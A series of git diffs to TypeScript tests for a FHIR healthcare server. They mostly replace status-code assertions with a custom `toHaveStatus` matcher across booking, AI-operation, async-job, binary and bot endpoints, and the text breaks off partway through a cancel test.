@@ -230,7 +230,7 @@ describe('Agent/$upgrade', () => {
       .get('/fhir/R4/Agent/$upgrade')
       .set('Authorization', 'Bearer ' + accessToken);
 
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     const bundle = res.body as Bundle<Parameters>;
 
     for (let i = 0; i < agents.length; i++) {
@@ -246,7 +246,7 @@ describe('Agent/$upgrade', () => {
       .get(`/fhir/R4/Agent/${agents[0].id}/$upgrade`)
       .set('Authorization', 'Bearer ' + accessToken);
 
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
 
     const outcome = res.body as OperationOutcome;
     expect(outcome).toMatchObject(badRequest('Something is broken'));
@@ -275,7 +275,7 @@ describe('Agent/$upgrade', () => {
       .get('/fhir/R4/Agent/$upgrade')
       .set('Authorization', 'Bearer ' + accessToken);
 
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     const bundle = res.body as Bundle<Parameters>;
 
     for (let i = 0; i < agents.length; i++) {
@@ -291,7 +291,7 @@ describe('Agent/$upgrade', () => {
       .get(`/fhir/R4/Agent/${agents[0].id}/$upgrade`)
       .set('Authorization', 'Bearer ' + accessToken);
 
-    expect(res.status).toBe(500);
+    expect(res).toHaveStatus(500);
 
     const outcome = res.body as OperationOutcome;
     expect(outcome).toMatchObject(serverError(new Error('Invalid response received from agent')));
@@ -319,7 +319,7 @@ describe('Agent/$upgrade', () => {
       .query({ force: true })
       .set('Authorization', 'Bearer ' + accessToken);
 
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     const bundle = res.body as Bundle<Parameters>;
 
     for (const agent of agents) {
@@ -332,7 +332,7 @@ describe('Agent/$upgrade', () => {
       .query({ force: true })
       .set('Authorization', 'Bearer ' + accessToken);
 
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
 
     const outcome = res.body as OperationOutcome;
     expect(outcome).toMatchObject(allOk);

--- a/packages/server/src/fhir/operations/ai.test.ts
+++ b/packages/server/src/fhir/operations/ai.test.ts
@@ -117,7 +117,7 @@ describe('AI Operation', () => {
         ],
       });
 
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.body.resourceType).toBe('Parameters');
     expect((res.body as Parameters).parameter).toHaveLength(2);
     expect((res.body as Parameters).parameter?.[0]?.name).toBe('content');
@@ -207,7 +207,7 @@ describe('AI Operation', () => {
         ],
       });
 
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.body.resourceType).toBe('Parameters');
 
     const params = res.body as Parameters;
@@ -285,7 +285,7 @@ describe('AI Operation', () => {
         ],
       });
 
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.body.resourceType).toBe('Parameters');
     expect((res.body as Parameters).parameter?.[0]?.valueString).toBe('I can help you with FHIR queries.');
     // When there are no tool calls, the implementation doesn't return a tool_calls parameter
@@ -319,7 +319,7 @@ describe('AI Operation', () => {
         ],
       });
 
-    expect(res.status).toBe(403);
+    expect(res).toHaveStatus(403);
   });
 
   test('Missing API key in project settings', async () => {
@@ -349,7 +349,7 @@ describe('AI Operation', () => {
         ],
       });
 
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect((res.body as OperationOutcome).issue?.[0]?.details?.text).toBe(
       'OpenAI API key not configured in project secrets'
     );
@@ -370,7 +370,7 @@ describe('AI Operation', () => {
         ],
       });
 
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect((res.body as OperationOutcome).issue?.[0]?.details?.text).toBe(
       'Expected 1 value(s) for input parameter model, but 0 provided'
     );
@@ -391,7 +391,7 @@ describe('AI Operation', () => {
         ],
       });
 
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect((res.body as OperationOutcome).issue?.[0]?.details?.text).toBe(
       'Expected 1 value(s) for input parameter messages, but 0 provided'
     );
@@ -416,7 +416,7 @@ describe('AI Operation', () => {
         ],
       });
 
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect((res.body as OperationOutcome).issue?.[0]?.details?.text).toBe('Messages must be an array');
   });
 
@@ -439,7 +439,7 @@ describe('AI Operation', () => {
         ],
       });
 
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect((res.body as OperationOutcome).issue?.[0]?.severity).toBe('error');
   });
 
@@ -466,7 +466,7 @@ describe('AI Operation', () => {
         ],
       });
 
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect((res.body as OperationOutcome).issue?.[0]?.severity).toBe('error');
   });
 
@@ -506,7 +506,7 @@ describe('AI Operation', () => {
         ],
       });
 
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.body.resourceType).toBe('Parameters');
     expect((res.body as Parameters).parameter?.[0]?.valueString).toBe('I can help you with general questions.');
 
@@ -543,7 +543,7 @@ describe('AI Operation', () => {
         ],
       });
 
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     const fetchCall = (global.fetch as Mock).mock.calls[0];
     const bodyParam = JSON.parse(fetchCall[1].body);
     expect(bodyParam.temperature).toBe(0.3);
@@ -572,7 +572,7 @@ describe('AI Operation', () => {
         ],
       });
 
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect((global.fetch as Mock).mock.calls[0][0]).toBe('https://api.openai.com/v1/chat/completions');
   });
 
@@ -609,7 +609,7 @@ describe('AI Operation', () => {
         ],
       });
 
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(global.fetch).toHaveBeenCalledWith(
       'https://litellm.example.com/v1/chat/completions',
       expect.objectContaining({
@@ -655,7 +655,7 @@ describe('AI Operation', () => {
         ],
       });
 
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect((global.fetch as Mock).mock.calls[0][0]).toBe('https://litellm.example.com/v1/chat/completions');
   });
 
@@ -666,7 +666,7 @@ describe('AI Operation', () => {
       .set('Content-Type', ContentType.TEXT)
       .send('hello');
 
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect((res.body as OperationOutcome).issue?.[0]?.details?.text).toContain(
       'Expected at least 1 value(s) for required input parameter'
     );
@@ -681,7 +681,7 @@ describe('AI Operation', () => {
         resourceType: 'Patient',
       });
 
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect((res.body as OperationOutcome).issue?.[0]?.details?.text).toContain(
       'Expected at least 1 value(s) for required input parameter'
     );
@@ -719,7 +719,7 @@ describe('AI Operation', () => {
         ],
       });
 
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
   });
 
   test('Handles multiple messages in conversation', async () => {
@@ -768,7 +768,7 @@ describe('AI Operation', () => {
         ],
       });
 
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
 
     const fetchCall = (global.fetch as Mock).mock.calls[0];
     const bodyParam = JSON.parse(fetchCall[1].body);
@@ -824,7 +824,7 @@ describe('AI Operation', () => {
         ],
       });
 
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     const params = res.body as Parameters;
 
     const contentParam = params.parameter?.find((p) => p.name === 'content');
@@ -875,7 +875,7 @@ describe('AI Operation', () => {
         ],
       });
 
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
 
     const fetchCall = (global.fetch as Mock).mock.calls[0];
     const bodyParam = JSON.parse(fetchCall[1].body);
@@ -930,7 +930,7 @@ describe('AI Operation', () => {
         ],
       });
 
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.headers['content-type']).toBe('text/event-stream');
 
     // Parse SSE format - should not be Parameters format
@@ -1018,7 +1018,7 @@ describe('AI Operation', () => {
         ],
       });
 
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.headers['content-type']).toBe('text/event-stream');
 
     // Verify response is SSE format, not Parameters format

--- a/packages/server/src/fhir/operations/asyncjobcancel.test.ts
+++ b/packages/server/src/fhir/operations/asyncjobcancel.test.ts
@@ -41,7 +41,7 @@ describe('AsyncJob/$cancel', () => {
         requestTime: new Date().toISOString(),
         request: 'random-request',
       } satisfies AsyncJob);
-    expect(res.status).toStrictEqual(201);
+    expect(res).toHaveStatus(201);
     expect(res.body).toBeDefined();
 
     const asyncJob = res.body as AsyncJob;
@@ -49,7 +49,7 @@ describe('AsyncJob/$cancel', () => {
     const res2 = await request(app)
       .post(`/fhir/R4/AsyncJob/${asyncJob.id}/$cancel`)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res2.status).toStrictEqual(200);
+    expect(res2).toHaveStatus(200);
     expect(res2.body).toMatchObject(allOk);
 
     const res3 = await request(app)
@@ -57,7 +57,7 @@ describe('AsyncJob/$cancel', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.FHIR_JSON);
 
-    expect(res3.status).toStrictEqual(200);
+    expect(res3).toHaveStatus(200);
     expect(res3.body).toMatchObject<AsyncJob>({
       id: asyncJob.id,
       resourceType: 'AsyncJob',
@@ -78,7 +78,7 @@ describe('AsyncJob/$cancel', () => {
         requestTime: new Date().toISOString(),
         request: 'random-request',
       } satisfies AsyncJob);
-    expect(res.status).toStrictEqual(201);
+    expect(res).toHaveStatus(201);
     expect(res.body).toBeDefined();
 
     const asyncJob = res.body as AsyncJob;
@@ -86,7 +86,7 @@ describe('AsyncJob/$cancel', () => {
     const res2 = await request(app)
       .post(`/fhir/R4/AsyncJob/${asyncJob.id}/$cancel`)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res2.status).toStrictEqual(200);
+    expect(res2).toHaveStatus(200);
     expect(res2.body).toMatchObject(allOk);
 
     const res3 = await request(app)
@@ -94,7 +94,7 @@ describe('AsyncJob/$cancel', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.FHIR_JSON);
 
-    expect(res3.status).toStrictEqual(200);
+    expect(res3).toHaveStatus(200);
     expect(res3.body).toMatchObject<AsyncJob>({
       id: asyncJob.id,
       resourceType: 'AsyncJob',
@@ -115,7 +115,7 @@ describe('AsyncJob/$cancel', () => {
         requestTime: new Date().toISOString(),
         request: 'random-request',
       } satisfies AsyncJob);
-    expect(res.status).toStrictEqual(201);
+    expect(res).toHaveStatus(201);
     expect(res.body).toBeDefined();
 
     const asyncJob = res.body as AsyncJob;
@@ -123,7 +123,7 @@ describe('AsyncJob/$cancel', () => {
     const res2 = await request(app)
       .post(`/fhir/R4/AsyncJob/${asyncJob.id}/$cancel`)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res2.status).toStrictEqual(400);
+    expect(res2).toHaveStatus(400);
 
     const outcome = res2.body as OperationOutcome;
     expect(outcome).toMatchObject(
@@ -160,7 +160,7 @@ describe('AsyncJob/$cancel', () => {
         .post(`/fhir/R4/AsyncJob/${asyncJob.id}/$cancel`)
         .set('Authorization', 'Bearer ' + accessToken)
         .set('X-Medplum', 'extended');
-      expect(res2.status).toStrictEqual(200);
+      expect(res2).toHaveStatus(200);
       expect(res2.body).toMatchObject(allOk);
 
       const res3 = await request(app)
@@ -168,7 +168,7 @@ describe('AsyncJob/$cancel', () => {
         .set('Authorization', 'Bearer ' + accessToken)
         .set('X-Medplum', 'extended');
 
-      expect(res3.status).toStrictEqual(200);
+      expect(res3).toHaveStatus(200);
       expect(res3.body).toStrictEqual({
         id: asyncJob.id,
         resourceType: 'AsyncJob',

--- a/packages/server/src/fhir/operations/binary-presigned-url.test.ts
+++ b/packages/server/src/fhir/operations/binary-presigned-url.test.ts
@@ -55,14 +55,14 @@ describe('Binary/$presigned-url', () => {
         resourceType: 'Binary',
         contentType: 'text/plain',
       } satisfies Binary);
-    expect(binRes.status).toBe(201);
+    expect(binRes).toHaveStatus(201);
     const binary = binRes.body as WithId<Binary>;
 
     const writeUrlRes = await testAgent
       .get(`/fhir/R4/Binary/${binary.id}/$presigned-url?upload=true`)
       .auth(accessToken, { type: 'bearer' })
       .send();
-    expect(writeUrlRes.status).toBe(200);
+    expect(writeUrlRes).toHaveStatus(200);
     const writeResult = writeUrlRes.body as Parameters;
     const writeUrl = new URL(writeResult.parameter?.[0]?.valueUri as string);
 
@@ -70,7 +70,7 @@ describe('Binary/$presigned-url', () => {
       .put(writeUrl.pathname + writeUrl.search)
       .set('Content-Type', 'text/plain')
       .send('foo bar baz quux');
-    expect(uploadRes.status).toBe(200);
+    expect(uploadRes).toHaveStatus(200);
   });
 
   test('Requires update permission to generate upload link', async () => {
@@ -88,7 +88,7 @@ describe('Binary/$presigned-url', () => {
         resourceType: 'Binary',
         contentType: 'text/plain',
       } satisfies Binary);
-    expect(binRes.status).toBe(201);
+    expect(binRes).toHaveStatus(201);
     const binary = binRes.body as WithId<Binary>;
 
     // Read URL should still be available
@@ -96,14 +96,14 @@ describe('Binary/$presigned-url', () => {
       .get(`/fhir/R4/Binary/${binary.id}/$presigned-url`)
       .auth(accessToken, { type: 'bearer' })
       .send();
-    expect(readUrlRes.status).toBe(200);
+    expect(readUrlRes).toHaveStatus(200);
 
     // Write URL not permitted
     const writeUrlRes = await request(server)
       .get(`/fhir/R4/Binary/${binary.id}/$presigned-url?upload=true`)
       .auth(accessToken, { type: 'bearer' })
       .send();
-    expect(writeUrlRes.status).toBe(403);
+    expect(writeUrlRes).toHaveStatus(403);
   });
 
   test('Requires securityContext read access to generate presigned URL', async () => {
@@ -113,7 +113,7 @@ describe('Binary/$presigned-url', () => {
       .post('/fhir/R4/Patient')
       .auth(testProject.accessToken, { type: 'bearer' })
       .send({ resourceType: 'Patient' });
-    expect(patientRes.status).toBe(201);
+    expect(patientRes).toHaveStatus(201);
 
     const binaryRes = await request(server)
       .post('/fhir/R4/Binary')
@@ -121,7 +121,7 @@ describe('Binary/$presigned-url', () => {
       .set('Content-Type', 'text/plain')
       .set('X-Security-Context', `Patient/${patientRes.body.id}`)
       .send('sensitive binary');
-    expect(binaryRes.status).toBe(201);
+    expect(binaryRes).toHaveStatus(201);
     const binary = binaryRes.body as WithId<Binary>;
 
     // Restricted user: can read Binary, but not Patient (the securityContext target)
@@ -147,27 +147,27 @@ describe('Binary/$presigned-url', () => {
     const patientReadRes = await request(server)
       .get(`/fhir/R4/Patient/${patientRes.body.id}`)
       .auth(restrictedUser.accessToken, { type: 'bearer' });
-    expect(patientReadRes.status).toBe(403);
+    expect(patientReadRes).toHaveStatus(403);
 
     // Restricted user should be blocked from getting a presigned URL
     const restrictedPresignRes = await request(server)
       .get(`/fhir/R4/Binary/${binary.id}/$presigned-url`)
       .auth(restrictedUser.accessToken, { type: 'bearer' })
       .send();
-    expect(restrictedPresignRes.status).toBe(403);
+    expect(restrictedPresignRes).toHaveStatus(403);
 
     // Permitted user with read access should succeed
     const permittedPresignRes = await request(server)
       .get(`/fhir/R4/Binary/${binary.id}/$presigned-url`)
       .auth(permittedUser.accessToken, { type: 'bearer' })
       .send();
-    expect(permittedPresignRes.status).toBe(200);
+    expect(permittedPresignRes).toHaveStatus(200);
 
     // Admin user with full access should succeed
     const authorizedPresignRes = await request(server)
       .get(`/fhir/R4/Binary/${binary.id}/$presigned-url`)
       .auth(testProject.accessToken, { type: 'bearer' })
       .send();
-    expect(authorizedPresignRes.status).toBe(200);
+    expect(authorizedPresignRes).toHaveStatus(200);
   });
 });

--- a/packages/server/src/fhir/operations/book.test.ts
+++ b/packages/server/src/fhir/operations/book.test.ts
@@ -183,7 +183,7 @@ describe('Appointment/$book', () => {
         ],
       });
 
-    expect(response.status).toEqual(400);
+    expect(response).toHaveStatus(400);
     expect(response.body).toHaveProperty('issue', [
       {
         code: 'invalid',
@@ -242,7 +242,7 @@ describe('Appointment/$book', () => {
       });
 
     expect(response.body).not.toHaveProperty('issue');
-    expect(response.status).toEqual(201);
+    expect(response).toHaveStatus(201);
 
     const entries = ((response.body as Bundle).entry ?? []).map((entry) => entry.resource).filter(isDefined);
 
@@ -326,7 +326,7 @@ describe('Appointment/$book', () => {
         expression: ['Parameters.appointment.contained[0].start', 'Parameters.appointment.contained[1].start'],
       },
     ]);
-    expect(response.status).toEqual(400);
+    expect(response).toHaveStatus(400);
   });
 
   test('with mismatched slot ends', async () => {
@@ -381,7 +381,7 @@ describe('Appointment/$book', () => {
         expression: ['Parameters.appointment.contained[0].end', 'Parameters.appointment.contained[1].end'],
       },
     ]);
-    expect(response.status).toEqual(400);
+    expect(response).toHaveStatus(400);
   });
 
   test('fails when there is an overlapping busy slot booked', async () => {
@@ -428,7 +428,7 @@ describe('Appointment/$book', () => {
         ],
       });
 
-    expect(response.status).toEqual(400);
+    expect(response).toHaveStatus(400);
 
     // Check no appointment was created
     const appointments = await systemRepo.searchResources<Appointment>(
@@ -481,7 +481,7 @@ describe('Appointment/$book', () => {
         },
       ],
     });
-    expect(response.status).toEqual(400);
+    expect(response).toHaveStatus(400);
   });
 
   test('it fails when trying to book outside of availability windows', async () => {
@@ -529,7 +529,7 @@ describe('Appointment/$book', () => {
         },
       ],
     });
-    expect(response.status).toEqual(400);
+    expect(response).toHaveStatus(400);
   });
 
   test.each([
@@ -586,9 +586,9 @@ describe('Appointment/$book', () => {
 
     if (succeeds) {
       expect(response.body).not.toHaveProperty('issue');
-      expect(response.status).toEqual(201);
+      expect(response).toHaveStatus(201);
     } else {
-      expect(response.status).toEqual(400);
+      expect(response).toHaveStatus(400);
     }
   });
 
@@ -637,7 +637,7 @@ describe('Appointment/$book', () => {
       });
 
     expect(response.body).not.toHaveProperty('issue');
-    expect(response.status).toEqual(201);
+    expect(response).toHaveStatus(201);
   });
 
   test('succeeds over adjacent explicit "free" slots', async () => {
@@ -698,7 +698,7 @@ describe('Appointment/$book', () => {
       });
 
     expect(response.body).not.toHaveProperty('issue');
-    expect(response.status).toEqual(201);
+    expect(response).toHaveStatus(201);
   });
 
   test('booking a slot with a different duration than scheduling parameters fails', async () => {
@@ -742,7 +742,7 @@ describe('Appointment/$book', () => {
         severity: 'error',
       },
     ]);
-    expect(response.status).toEqual(400);
+    expect(response).toHaveStatus(400);
   });
 
   test.each([
@@ -815,7 +815,7 @@ describe('Appointment/$book', () => {
           ],
         });
       expect(response.body).not.toHaveProperty('issue');
-      expect(response.status).toEqual(201);
+      expect(response).toHaveStatus(201);
     }
   );
 
@@ -884,7 +884,7 @@ describe('Appointment/$book', () => {
           },
         ],
       });
-    expect(response1.status).toEqual(400);
+    expect(response1).toHaveStatus(400);
 
     // Booking with buffer in the availability window succeeds
     const response2 = await request
@@ -923,7 +923,7 @@ describe('Appointment/$book', () => {
         ],
       });
     expect(response2.body).not.toHaveProperty('issue');
-    expect(response2.status).toEqual(201);
+    expect(response2).toHaveStatus(201);
 
     // It creates a bufferBefore slot with status: 'busy-unavailable'
     const entries = ((response2.body as Bundle).entry ?? []).map((entry) => entry.resource).filter(isDefined);
@@ -1009,7 +1009,7 @@ describe('Appointment/$book', () => {
           },
         ],
       });
-    expect(response1.status).toEqual(400);
+    expect(response1).toHaveStatus(400);
 
     // Booking with buffer in the availability window succeeds
     const response2 = await request
@@ -1048,7 +1048,7 @@ describe('Appointment/$book', () => {
         ],
       });
     expect(response2.body).not.toHaveProperty('issue');
-    expect(response2.status).toEqual(201);
+    expect(response2).toHaveStatus(201);
 
     // It creates a bufferAfter slot with status: 'busy-unavailable'
     const entries = ((response2.body as Bundle).entry ?? []).map((entry) => entry.resource).filter(isDefined);
@@ -1103,7 +1103,7 @@ describe('Appointment/$book', () => {
       });
 
     expect(response.body).not.toHaveProperty('issue');
-    expect(response.status).toEqual(201);
+    expect(response).toHaveStatus(201);
 
     const entries = ((response.body as Bundle).entry ?? []).map((entry) => entry.resource).filter(isDefined);
 
@@ -1161,7 +1161,7 @@ describe('Appointment/$book', () => {
         ],
       });
 
-    expect(response.status).toEqual(400);
+    expect(response).toHaveStatus(400);
     expect(response.body).toMatchObject({
       resourceType: 'OperationOutcome',
       issue: [{ details: { text: 'Proposed appointment must not have Slot references' } }],
@@ -1218,7 +1218,7 @@ describe('Appointment/$book', () => {
         ],
       });
 
-    expect(misalignedResponse.status).toEqual(400);
+    expect(misalignedResponse).toHaveStatus(400);
     expect(misalignedResponse.body).toMatchObject({
       resourceType: 'OperationOutcome',
       issue: [{ details: { text: 'Slot start time is not aligned to the scheduling grid' } }],
@@ -1258,7 +1258,7 @@ describe('Appointment/$book', () => {
       });
 
     expect(alignedResponse.body).not.toHaveProperty('issue');
-    expect(alignedResponse.status).toEqual(201);
+    expect(alignedResponse).toHaveStatus(201);
   });
 
   describe('Loading schedulingParameters from HealthcareService', () => {
@@ -1334,7 +1334,7 @@ describe('Appointment/$book', () => {
         });
 
       expect(response.body).not.toHaveProperty('issue');
-      expect(response.status).toEqual(201);
+      expect(response).toHaveStatus(201);
     });
 
     test('fails when booking outside HealthcareService availability', async () => {
@@ -1372,7 +1372,7 @@ describe('Appointment/$book', () => {
           ],
         });
 
-      expect(response.status).toEqual(400);
+      expect(response).toHaveStatus(400);
     });
 
     test('Schedule-specific parameters override HealthcareService parameters', async () => {
@@ -1449,7 +1449,7 @@ describe('Appointment/$book', () => {
           ],
         });
       expect(response60.body).not.toHaveProperty('issue');
-      expect(response60.status).toEqual(201);
+      expect(response60).toHaveStatus(201);
 
       // 30-min slot fails (HealthcareService duration was overridden by Schedule)
       const response30 = await request
@@ -1480,7 +1480,7 @@ describe('Appointment/$book', () => {
             },
           ],
         });
-      expect(response30.status).toEqual(400);
+      expect(response30).toHaveStatus(400);
       expect(response30.body).toMatchObject({
         resourceType: 'OperationOutcome',
         issue: [
@@ -1529,7 +1529,7 @@ describe('Appointment/$book', () => {
           },
         ],
       });
-    expect(response.status).toBe(400);
+    expect(response).toHaveStatus(400);
     expect(response.body.issue[0].details.text).toBe('Appointment falls outside schedule planning horizon');
   });
 
@@ -1568,7 +1568,7 @@ describe('Appointment/$book', () => {
           },
         ],
       });
-    expect(response.status).toBe(400);
+    expect(response).toHaveStatus(400);
     expect(response.body.issue[0].details.text).toBe('Appointment falls outside schedule planning horizon');
   });
 });
@@ -1634,7 +1634,7 @@ describe('scheduling flow integration test', () => {
       });
 
     expect(findResponse.body).not.toHaveProperty('issue');
-    expect(findResponse.status).toBe(200);
+    expect(findResponse).toHaveStatus(200);
     expect(findResponse.body.entry?.length).toBeGreaterThan(0);
 
     const proposedAppointment: Appointment = findResponse.body.entry[1].resource;
@@ -1649,7 +1649,7 @@ describe('scheduling flow integration test', () => {
       });
 
     expect(bookResponse.body).not.toHaveProperty('issue');
-    expect(bookResponse.status).toBe(201);
+    expect(bookResponse).toHaveStatus(201);
 
     const entries = ((bookResponse.body as Bundle).entry ?? []).map((e) => e.resource).filter(isDefined);
     const appointments = entries.filter(isAppointment);
@@ -1784,7 +1784,7 @@ describe('scheduling flow integration test', () => {
       });
 
     expect(response.body).not.toHaveProperty('issue');
-    expect(response.status).toEqual(201);
+    expect(response).toHaveStatus(201);
 
     const entries = ((response.body as Bundle).entry ?? []).map((entry) => entry.resource).filter(isDefined);
 
@@ -1816,7 +1816,7 @@ describe('scheduling flow integration test', () => {
       .send();
 
     expect(otherPatientResponse.body).not.toHaveProperty('issue');
-    expect(otherPatientResponse.status).toEqual(200);
+    expect(otherPatientResponse).toHaveStatus(200);
     expect(otherPatientResponse.body).toHaveProperty('entry');
     expect(otherPatientResponse.body.entry).toHaveLength(1);
     expect(otherPatientResponse.body.entry[0].resource).toEqual({

--- a/packages/server/src/fhir/operations/book.test.ts
+++ b/packages/server/src/fhir/operations/book.test.ts
@@ -241,7 +241,6 @@ describe('Appointment/$book', () => {
         ],
       });
 
-    expect(response.body).not.toHaveProperty('issue');
     expect(response).toHaveStatus(201);
 
     const entries = ((response.body as Bundle).entry ?? []).map((entry) => entry.resource).filter(isDefined);
@@ -585,7 +584,6 @@ describe('Appointment/$book', () => {
       });
 
     if (succeeds) {
-      expect(response.body).not.toHaveProperty('issue');
       expect(response).toHaveStatus(201);
     } else {
       expect(response).toHaveStatus(400);
@@ -636,7 +634,6 @@ describe('Appointment/$book', () => {
         ],
       });
 
-    expect(response.body).not.toHaveProperty('issue');
     expect(response).toHaveStatus(201);
   });
 
@@ -697,7 +694,6 @@ describe('Appointment/$book', () => {
         ],
       });
 
-    expect(response.body).not.toHaveProperty('issue');
     expect(response).toHaveStatus(201);
   });
 
@@ -814,7 +810,6 @@ describe('Appointment/$book', () => {
             },
           ],
         });
-      expect(response.body).not.toHaveProperty('issue');
       expect(response).toHaveStatus(201);
     }
   );
@@ -922,7 +917,6 @@ describe('Appointment/$book', () => {
           },
         ],
       });
-    expect(response2.body).not.toHaveProperty('issue');
     expect(response2).toHaveStatus(201);
 
     // It creates a bufferBefore slot with status: 'busy-unavailable'
@@ -1047,7 +1041,6 @@ describe('Appointment/$book', () => {
           },
         ],
       });
-    expect(response2.body).not.toHaveProperty('issue');
     expect(response2).toHaveStatus(201);
 
     // It creates a bufferAfter slot with status: 'busy-unavailable'
@@ -1102,7 +1095,6 @@ describe('Appointment/$book', () => {
         ],
       });
 
-    expect(response.body).not.toHaveProperty('issue');
     expect(response).toHaveStatus(201);
 
     const entries = ((response.body as Bundle).entry ?? []).map((entry) => entry.resource).filter(isDefined);
@@ -1257,7 +1249,6 @@ describe('Appointment/$book', () => {
         ],
       });
 
-    expect(alignedResponse.body).not.toHaveProperty('issue');
     expect(alignedResponse).toHaveStatus(201);
   });
 
@@ -1333,7 +1324,6 @@ describe('Appointment/$book', () => {
           ],
         });
 
-      expect(response.body).not.toHaveProperty('issue');
       expect(response).toHaveStatus(201);
     });
 
@@ -1448,7 +1438,6 @@ describe('Appointment/$book', () => {
             },
           ],
         });
-      expect(response60.body).not.toHaveProperty('issue');
       expect(response60).toHaveStatus(201);
 
       // 30-min slot fails (HealthcareService duration was overridden by Schedule)
@@ -1633,7 +1622,6 @@ describe('scheduling flow integration test', () => {
         schedule: `Schedule/${schedule.id}`,
       });
 
-    expect(findResponse.body).not.toHaveProperty('issue');
     expect(findResponse).toHaveStatus(200);
     expect(findResponse.body.entry?.length).toBeGreaterThan(0);
 
@@ -1648,7 +1636,6 @@ describe('scheduling flow integration test', () => {
         parameter: [{ name: 'appointment', resource: proposedAppointment }],
       });
 
-    expect(bookResponse.body).not.toHaveProperty('issue');
     expect(bookResponse).toHaveStatus(201);
 
     const entries = ((bookResponse.body as Bundle).entry ?? []).map((e) => e.resource).filter(isDefined);
@@ -1783,7 +1770,6 @@ describe('scheduling flow integration test', () => {
         ],
       });
 
-    expect(response.body).not.toHaveProperty('issue');
     expect(response).toHaveStatus(201);
 
     const entries = ((response.body as Bundle).entry ?? []).map((entry) => entry.resource).filter(isDefined);
@@ -1815,7 +1801,6 @@ describe('scheduling flow integration test', () => {
       .set('Authorization', `Bearer ${otherPatient.accessToken}`)
       .send();
 
-    expect(otherPatientResponse.body).not.toHaveProperty('issue');
     expect(otherPatientResponse).toHaveStatus(200);
     expect(otherPatientResponse.body).toHaveProperty('entry');
     expect(otherPatientResponse.body.entry).toHaveLength(1);

--- a/packages/server/src/fhir/operations/botinit.test.ts
+++ b/packages/server/src/fhir/operations/botinit.test.ts
@@ -35,7 +35,7 @@ describe('Bot $init', () => {
         name: 'Alice personal bot',
         description: 'Alice bot description',
       });
-    expect(res2.status).toBe(403);
+    expect(res2).toHaveStatus(403);
   });
 
   test('Missing both data and url', async () => {
@@ -52,7 +52,7 @@ describe('Bot $init', () => {
         description: 'Alice bot description',
         sourceCode: { title: 'missing data and url', contentType: ContentType.JAVASCRIPT },
       });
-    expect(res2.status).toBe(400);
+    expect(res2).toHaveStatus(400);
     expect(res2.body).toMatchObject(badRequest('Invalid attachment: Missing data or url'));
   });
 
@@ -70,7 +70,7 @@ describe('Bot $init', () => {
         description: 'Alice bot description',
         sourceCode: { title: 'invalid base-64 data', contentType: ContentType.JAVASCRIPT, data: 'invalid-base64' },
       });
-    expect(res2.status).toBe(400);
+    expect(res2).toHaveStatus(400);
     expect(res2.body).toMatchObject(badRequest('Invalid attachment: Invalid base64 data'));
   });
 
@@ -89,7 +89,7 @@ describe('Bot $init', () => {
         name: 'Alice personal bot',
         description: 'Alice bot description',
       });
-    expect(res2.status).toBe(201);
+    expect(res2).toHaveStatus(201);
     expect(res2.body.resourceType).toBe('Bot');
     expect(res2.body.id).toBeDefined();
     expect(res2.body.code).toBeUndefined();
@@ -100,7 +100,7 @@ describe('Bot $init', () => {
     const res3 = await request(app)
       .get('/fhir/R4/Bot/' + res2.body.id)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res3.status).toBe(200);
+    expect(res3).toHaveStatus(200);
     expect(res3.body.resourceType).toBe('Bot');
     expect(res3.body.id).toBe(res2.body.id);
 
@@ -110,7 +110,7 @@ describe('Bot $init', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .type('json')
       .send({ foo: 'bar' });
-    expect(res4.status).toBe(400);
+    expect(res4).toHaveStatus(400);
   });
 
   test('Create bot with base-64 source code', async () => {
@@ -153,7 +153,7 @@ describe('Bot $init', () => {
           data: Buffer.from(executableCode).toString('base64'),
         },
       });
-    expect(res2.status).toBe(201);
+    expect(res2).toHaveStatus(201);
     expect(res2.body.resourceType).toBe('Bot');
     expect(res2.body.id).toBeDefined();
     expect(res2.body.code).toBeUndefined();

--- a/packages/server/src/fhir/operations/cancel.test.ts
+++ b/packages/server/src/fhir/operations/cancel.test.ts
@@ -80,7 +80,7 @@ describe('Appointment/$cancel', () => {
       .set('Authorization', `Bearer ${project.accessToken}`);
 
     expect(response.body).not.toHaveProperty('issue');
-    expect(response.status).toEqual(200);
+    expect(response).toHaveStatus(200);
   });
 
   test('Succeeds for a pending appointment', async () => {
@@ -92,7 +92,7 @@ describe('Appointment/$cancel', () => {
       .set('Authorization', `Bearer ${project.accessToken}`);
 
